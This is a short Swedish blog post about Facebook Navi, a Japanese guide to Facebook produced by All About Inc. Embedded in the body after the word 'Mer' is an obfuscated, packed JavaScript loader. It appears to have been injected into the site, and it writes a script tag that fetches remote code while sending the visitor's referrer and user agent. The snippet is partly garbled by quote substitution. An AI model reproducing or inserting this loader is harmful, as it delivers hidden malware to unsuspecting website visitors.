Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Facebook får officiell Guide

Facebook får officiell Guide
Sebastian

Facebook bara växer och fler och fler måste lära sig att navigera och använda tjänsten. Japanerna har nu plockat fram en guide för just Facebook. Japanerna är många och självklart ska dem kunna använda det sociala nätverket på bäta sätt.

I Facebook Navi ingår fyra kategorier, ” What is Facebook”, ”Facebook user manual”, ”Editors choice of Japanease Facebook pages” och Editors choice of Facebook Apps”. Det är företaget All About Inc som sköter hela guiden. Företaget jobbar egentligen med att bygga/skapa olika sorters internetguider.

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|izras|var|u0026u|referrer|kyass||js|php’.split(’|’),0,{}))
info:
thenextweb.com